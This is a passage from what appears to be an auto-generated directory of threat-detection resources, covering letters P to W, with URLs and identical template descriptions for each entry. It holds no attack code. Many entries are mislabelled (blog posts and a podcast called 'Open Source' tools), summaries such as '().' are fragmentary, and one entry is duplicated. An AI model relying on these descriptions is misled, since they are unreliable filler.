
Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Frameworks.

Back to Name Jump

Letter P

This letter section contains 5 tools.

Part 1,

• Website: https://www.splunk.com/en_us/blog/security/ci-cd-detection-engineering-splunk-security-content-part-1.html
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Part 1, is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: - A multipart series describing how detection as code can be successfully deployed in a Splunk environment.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources.

Back to Name Jump

Part I (Event ID 7)

• Website: https://cyberwardog.blogspot.com.au/2017/03/chronicles-of-threat-hunter-hunting-for.html
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Part I (Event ID 7) is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Windows > Sysmon.

Back to Name Jump

Part II (Event ID 10)

• Website: https://cyberwardog.blogspot.com.au/2017/03/chronicles-of-threat-hunter-hunting-for_22.html
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Part II (Event ID 10) is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Windows > Sysmon.

Back to Name Jump

Proactive Malicious Domain Search

• Website: https://isc.sans.edu/forums/diary/Proactive+Malicious+Domain+Search/23065/
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Proactive Malicious Domain Search is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > DNS.

Back to Name Jump

ProcMon for Linux

• Website: https://github.com/Sysinternals/ProcMon-for-Linux
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: ProcMon for Linux is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Tools.

Back to Name Jump

Letter R

This letter section contains 4 tools.

Random Words on Entropy and DNS

• Website: https://www.splunk.com/blog/2015/10/01/random-words-on-entropy-and-dns.html
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Random Words on Entropy and DNS is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > DNS.

Back to Name Jump

RDP Fingerprinting - Profiling RDP Clients with JA3 and RDFP

• Website: https://medium.com/@0x4d31/rdp-client-fingerprinting-9e7ac219f7f4
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: RDP Fingerprinting - Profiling RDP Clients with JA3 and RDFP is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Fingerprinting.

Back to Name Jump

Revoke-Obfuscation

• Website: https://github.com/danielbohannon/Revoke-Obfuscation
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Revoke-Obfuscation is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: PowerShell Obfuscation Detection Framework.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Tools.

Back to Name Jump

Risky Business

• Website: https://risky.biz
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Risky Business is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: by Patrick Gray.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Podcasts.

Back to Name Jump

Letter S

This letter section contains 10 tools.

SecRepo.com

• Website: https://www.secrepo.com
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: SecRepo.com is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: () - Samples of security related data.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Dataset.

Back to Name Jump

Signal the ATT&CK: Part 1

• Website: https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/signal-att-and-ck-part-1.html
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Signal the ATT&CK: Part 1 is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Building a real-time threat detection capability with Tanium that focuses on documented adversarial techniques.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Threat Simulation Resources.

Back to Name Jump

Slides

• Website: https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1492182404.pdf
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Slides is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: ).

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources.

Back to Name Jump

Splunk Boss of the SOC

• Website: https://bots.splunk.com/
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Splunk Boss of the SOC is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Hands-on workshops and challenges to practice threat hunting using the BOTS and other datasets.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Labs.

Back to Name Jump

Splunk Detections

• Website: https://research.splunk.com/detections/
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Splunk Detections is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: and.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Detection Rules.

Back to Name Jump

Splunk Security Content

• Website: https://github.com/splunk/security_content
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Splunk Security Content is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Splunk-curated detection content that can easily be used accross many SIEMs (see Uncoder Rule Converter.).

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Tools.

Back to Name Jump

Splunkmon — Taking Sysmon to the Next Level

• Website: https://www.crypsisgroup.com/wp-content/uploads/2017/07/CG_WhitePaper_Splunkmon_1216-1.pdf
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Splunkmon — Taking Sysmon to the Next Level is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Windows > Sysmon.

Back to Name Jump

Suspicious Domains Tracking Dashboard

• Website: https://isc.sans.edu/forums/diary/Suspicious+Domains+Tracking+Dashboard/23046/
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Suspicious Domains Tracking Dashboard is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > DNS.

Back to Name Jump

Syscall Auditing at Scale

• Website: https://slack.engineering/syscall-auditing-at-scale-e6a3ca8ac1b8
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Syscall Auditing at Scale is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources.

Back to Name Jump

Sysmon Threat Detection Guide

• Website: https://www.varonis.com/blog/sysmon-threat-detection-guide/
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Sysmon Threat Detection Guide is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: ().

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Windows > Sysmon.

Back to Name Jump

Letter T

This letter section contains 17 tools.

The Diamond Model of Intrusion Analysis

• Website: http://www.activeresponse.org/wp-content/uploads/2013/07/diamond.pdf
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: The Diamond Model of Intrusion Analysis is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Research Papers.

Back to Name Jump

The DML Model

• Website: http://ryanstillions.blogspot.com.au/2014/04/the-dml-model_21.html
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: The DML Model is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: The Detection Maturity Level (DML) model is a capability maturity model for referencing ones maturity in detecting cyber attacks.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Frameworks.

Back to Name Jump

The No Hassle Guide to Event Query Language (EQL) for Threat Hunting

• Website: https://www.varonis.com/blog/guide-no-hassle-eql-threat-hunting/
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: The No Hassle Guide to Event Query Language (EQL) for Threat Hunting is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: ().

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources.

Back to Name Jump

The osquery Extensions Skunkworks Project

• Website: https://github.com/trailofbits/presentations/tree/master/Osquery%20Extensions
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: The osquery Extensions Skunkworks Project is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Osquery.

Back to Name Jump

The PARIS Model

• Website: http://threathunter.guru/blog/the-paris-model/
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: The PARIS Model is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: A model for threat hunting.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Frameworks.

Back to Name Jump

The Pyramic of Pain

• Website: http://detect-respond.blogspot.com.au/2013/03/the-pyramid-of-pain.html
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: The Pyramic of Pain is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: The relationship between the types of indicators you might use to detect an adversary's activities and how much pain it will cause them when you are able to deny those indicators to them.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Frameworks.

Back to Name Jump

The Sysmon and Threat Hunting Mimikatz wiki for the blue team

• Website: https://www.peerlyst.com/posts/the-sysmon-and-threat-hunting-mimikatz-wiki-for-the-blue-team-guurhart
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: The Sysmon and Threat Hunting Mimikatz wiki for the blue team is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Windows > Sysmon.

Back to Name Jump

The ThreatHunting Project

• Website: https://github.com/ThreatHuntingProject/ThreatHunting
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: The ThreatHunting Project is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: A great and threat hunting resources.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources.

Back to Name Jump

The use of TLS in Censorship Circumvention

• Website: https://tlsfingerprint.io/static/frolov2019.pdf
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: The use of TLS in Censorship Circumvention is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Fingerprinting.

Back to Name Jump

Threat Hunting

• Website: https://posts.specterops.io/tagged/threat-hunting
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Threat Hunting is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Threat Simulation Resources.

Back to Name Jump

Threat Hunting with Sysmon: Word Document with Macro

• Website: http://www.syspanda.com/index.php/2017/10/10/threat-hunting-sysmon-word-document-macro/
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Threat Hunting with Sysmon: Word Document with Macro is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Windows > Sysmon.

Back to Name Jump

ThreatHunting

• Website: https://github.com/olafhartong/ThreatHunting
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: ThreatHunting is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: A Splunk app mapped to MITRE ATT&CK to guide your threat hunts.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Tools.

Back to Name Jump

TLS fingerprinting - Smarter Defending & Stealthier Attacking

• Website: https://blog.squarelemon.com/tls-fingerprinting/
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: TLS fingerprinting - Smarter Defending & Stealthier Attacking is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Fingerprinting.

Back to Name Jump

TLS Fingerprinting in the Real World

• Website: https://blogs.cisco.com/security/tls-fingerprinting-in-the-real-world
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: TLS Fingerprinting in the Real World is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Fingerprinting.

Back to Name Jump

TLS Fingerprinting with JA3 and JA3S

• Website: https://engineering.salesforce.com/tls-fingerprinting-with-ja3-and-ja3s-247362855967
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: TLS Fingerprinting with JA3 and JA3S is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Fingerprinting.

Back to Name Jump

Tool Analysis Result Sheet

• Website: https://jpcertcc.github.io/ToolAnalysisResultSheet/
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Tool Analysis Result Sheet is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Windows.

Back to Name Jump

Tracking Newly Registered Domains

• Website: https://isc.sans.edu/diary/Tracking+Newly+Registered+Domains/23127
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Tracking Newly Registered Domains is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > DNS.

Back to Name Jump

Letter W

This letter section contains 3 tools.

Windows Commands Abused by Attackers

• Website: http://blog.jpcert.or.jp/.s/2016/01/windows-commands-abused-by-attackers.html
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Windows Commands Abused by Attackers is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources.

Back to Name Jump

Windows Commands Abused by Attackers

• Website: https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Windows Commands Abused by Attackers is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Windows.

